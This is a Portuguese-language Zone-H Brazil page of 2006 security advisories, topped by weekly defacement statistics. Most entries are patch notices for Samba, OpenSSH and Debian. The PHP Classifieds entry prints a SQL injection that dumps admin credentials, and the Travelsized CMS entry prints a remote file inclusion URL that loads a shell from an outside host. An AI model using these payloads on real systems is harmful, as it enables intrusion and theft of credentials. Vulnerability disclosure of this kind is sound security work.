Zone-H Advertisement
Home arrow Avisos de Segurança
24 de julho de 2008
 
 
Ataques desta semana
O.S.  Defs.  %
Linux  4781  66.99%
Win 2003  1787  25.04%
Win 2000  297  4.16%
FreeBSD  140  1.96%
MacOSX  67  0.94%
Other  65  0.91%

Total de ataques: 7137 dos quais 2642 único(s) no ip e 4495 invasão(ões) em massa

Menu Principal
Home
Guerra Digital
Geopolítica
Notícias ITsec
Avisos de Segurança
Test Drive
360°
Sites atacados
Eventos do Zone-H
Fórum
Publicações
Zone-H Amigos/Parceiros
Contate-nos
Sobre este Site
Membros do Zone-H BR
Favoritos geral
Zone-H.org
Área de download
Avisos de Segurança
PHP Classifieds: Injeção de Codigos SQL PDF Imprimir E-mail
Avaliação do Usuário: / 0
05 de outubro de 2006

Nome do Script: PHP Classifieds
Site do script: www.deltascripts.com/phpclassifieds
Versão Afetada: 7.1

Encontrado por Kzar
Email: Este endereço de e-mail está sendo protegido de spam, você precisa de Javascript habilitado para vê-lo

Exploração:

search.php?catid_search=[sql]
index.php?catid=[sql]

Exemplo:

index.php?catid=0 UNION SELECT concat(adm_name, space(1), adm_pass) AS adm_name, NULL FROM phpclass_admins
 

 
Travelsized CMS: Inclusão de Arquivos Remotos PDF Imprimir E-mail
Avaliação do Usuário: / 0
04 de outubro de 2006
Nome do Script: Travelsized CMS
Site do script: http://prdownloads.sourceforge.net/uberghey/travelsized-0.4.tar.bz2?download
Versão Afetada: 0.4

Encontrado pelo Polonês Kacper (a.k.a Rahim)
Email: Este endereço de e-mail está sendo protegido de spam, você precisa de Javascript habilitado para vê-lo

Exploração:

http://www.site.com/[Travelsized_path]/frontpage.php?setup_folder=http://server/shell.txt?
 
Bug no HP-UX CIFS Server(Samba) permite acesso não autorizado PDF Imprimir E-mail
Avaliação do Usuário: / 1
03 de outubro de 2006

a Security-Alert Hp Com. informou hoje sobre uma falha no HP-UX CIFS Server (Samba) que permite acesso não autorizado e privilégios elevados.

 Versões Afetadas:

HP-UX B.11.11

HP-UX B.11.23

E todas as versões até A.02.02.01 são afetadas.

Solução:

A HP forneceu a atualização do software para resolver esse bug, HP-UX CIFS Server (Samba) version A.02.03, que pode ser baixada no site http://software.hp.com

 

 
OpenSSH 4.4: Atualização corrige multiplas falhas de segurança PDF Imprimir E-mail
Avaliação do Usuário: / 2
Por Marcelo Almeida (Vympel)   
29 de setembro de 2006

Foram reportadas várias falhas de segurança no SSH versão 4.3 e anteriores, que podem causar DoS local e acesso remoto entre outras falhas e bugs reportados.

Usuários com versões anteriores a 4.4 devem atualizar o sistema para garantir  a segurança e integridade do mesmo.

Algumas distribuição como RedHat, FreeBSD, OpenBSD já possuem a correção em seus sites de atualizações, demais usuários podem obter cópias das atualizações diretamente no site do OpenSSH.
Aviso original

 
Debian: Multiplas atualizações de segurança PDF Imprimir E-mail
Avaliação do Usuário: / 1
Por Marcelo Almeida (Vympel)   
04 de setembro de 2006

A Debian disponibilizou pacotes de atualizações para  imagemagick, apache e cheesetracker.
Usuários rodando alguma destas aplicações deve executar a atualização do sistema nos sequientes endereços:

Cheesetracker
http://www.debian.org/security/2006/dsa-1166 
Apache http://www.debian.org/security/2006/dsa-1167
imagemagick http://www.debian.org/security/2006/dsa-1168

 

 
Interact NFIG[BASE_PATH]) Inclusão de arquivos remotos PDF Imprimir E-mail
Avaliação do Usuário: / 1
Por Marcelo Almeida (Vympel)   
30 de agosto de 2006
Romanian Electronic Network Security Lab Team ThE Best Romanian Hacking Team] - -
Cce-interact <= 2.2.0 (CONFIG[BASE_PATH]) Inclusão de arquivos remotos
[Script name: Interact - Online Learning and Collaboration System v. 2.2.0
[Script site: https://sourceforge.net/projects/cce-interact/
Encontrado por: CarcaBot
Contato: CarcaBotx_at_yahoo.com
Página com falha => admin/autoprompter.php line 33-38: ...
Leia mais...
 
<< Início < Anterior 1 2 3 4 5 6 7 8 9 Próximo > Fim >>

Resultados 183 - 208 de 231
 
Top! Top!